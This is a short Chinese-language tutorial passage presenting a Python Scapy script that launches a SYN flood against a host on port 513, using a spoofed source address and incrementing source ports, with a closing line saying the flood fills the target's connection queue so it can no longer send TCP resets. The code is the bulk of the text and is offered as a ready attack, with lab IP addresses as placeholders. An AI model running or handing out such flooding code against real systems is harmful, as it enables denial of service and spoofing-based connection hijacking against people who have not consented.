使用Scapy实现SYN泛洪攻击其实很简单。我们只需要制造一些载有TCP协议层的IP数据包,让这些包里面的TCP源端口不断自增一就好,而目的的TCP端口总是为513
源代码如下:
#encoding:utf-8
from scapy.all import *
def synFlood(src,tgt):
for sport in range(1024,65535):
IPlayer=IP(src=src,dst=tgt)
TCPlayer=TCP(sport=sport,dport=513)
pkt=IPlayer/TCPlayer
send(pkt)
src="192.168.11.144"
tgt="192.168.11.138"
synFlood(src,tgt)
运行攻击代码,我们将发送的TCP SYN包将会耗尽目标的资源,填满其连接的队列,最终达到消除目标发送TCP-reset数据包的目的。